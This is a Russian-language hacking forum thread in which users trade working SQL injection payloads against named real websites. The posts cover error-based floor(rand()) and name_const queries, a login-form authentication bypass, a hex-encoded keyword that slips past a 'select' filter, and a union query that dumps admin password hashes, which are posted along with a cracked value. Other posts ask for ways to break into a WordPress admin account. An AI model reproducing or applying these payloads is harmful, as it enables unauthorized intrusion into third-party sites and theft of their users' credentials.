Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    народ прошу помоши в раскрутке через floor rand

    вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
    _http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select%20count(*),concat(version(),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)--

    _http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select%20count(*),concat(database(),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)--

    может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается
     
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Просто фильтрация на from information_schema.tables
     
    #12502 Ctacok, 24 Apr 2010
    Last edited: 24 Apr 2010
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну знаю что может быть фильтрация но я основном мучаюс что не могу составит правильный запрос с таким типам скуля. Ну стандартные вроде знаю но тут метод Qwazar как то не очень то гоняю. Попробовал через toolza там тоже не пашет
     
  4. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    ну могыт так: selselectect )) хз


    Мужики))хдд
    http://www.bilandima.ru/html/promofoto.php?p=156_anasteshiya' ДИМА БИЛАН))хы
     
  5. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    http://www.keyin.ca/news.asp?id=52&news=showall

    может найдется чувак который обойдет фильтр на select
     
  6. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    http://www.keyin.ca/admin/default.asp

    в поле логин admin' or (1,2)=(select * from (select name_const(version(),1),name_const(version(),1))x)--
     
    1 person likes this.
  7. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    это хорошо..=) но надо select обойти... меня не интересует админский доступ
    очень интересует именно обход фильтра на select
     
  8. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Крутите так, какая разница нах...
    Какой обход.

    ' and (select 1 from (select count(0),concat(database(),':',user(),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
    ps file_priv у юзера нет!
     
    #12508 Strilo4ka, 24 Apr 2010
    Last edited: 24 Apr 2010
    7 people like this.
  9. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall
     
  10. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    http://www.keyin.ca/news.asp?id=-52+union+%73%65%6C%65%63%74+1,2,3,version(),5&news=showall
     
    3 people like this.
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    thanks как я недодумался....
     
  12. $T@$

    $T@$ Banned

    Joined:
    29 Mar 2010
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    WordPress 2.7.1
    Имею ввиду уязвимость, позволяющая узнать пароль админа, сбросить его себе на ящик, подменить исполняемый код, SQL инъекция, узнать e-mail администратора?

    Условие - регистрация закрыта, постинг запрещён, для рядового пользователя разрешены только комментарии.
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    На этом сайте достал такие hash

    http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_userName,g_hashedPassword)+from+g2_User+--+

    guest:LajD09f455fd66378f12280bfd7894ce5b46
    admin:kNaScfa395e30ad8195a4975c91eee51f33c

    подбор

    09f455fd66378f12280bfd7894ce5b46:LajD

    В админку попасть не удается

    http://slr-zone.com/shop/

    Что можете еще посоветовать?

    Заранее всем спасибо!
     
  14. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    esli tebya mysql version() toqda..
    http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_const(version(),1),name_const(version(),1))a)
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196

    прозреваю, что это хеши от старой инсталляции gallery2, которая лежит в какой-то папке на серве.

    http://slr-zone.com/shop/ - это неустановленная gallery2, можешь завершить инсталляцию, вписав свои данные и там видно будет.
     
    1 person likes this.
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    есть) хекеры там типо:
    Code:
    http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
    
     
    1 person likes this.
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    если FreeBsD криво настроенный - то можно содержимое папочек увидеть
     
  18. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    а так такую уязвимость через тулзу раскрутить ?
    сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось :(
     
  19. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    http://www.oragir.am/news.php?id=-13%27a

    tut sql ??
     
  20. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    нет
     
Loading...
Thread Status:
Not open for further replies.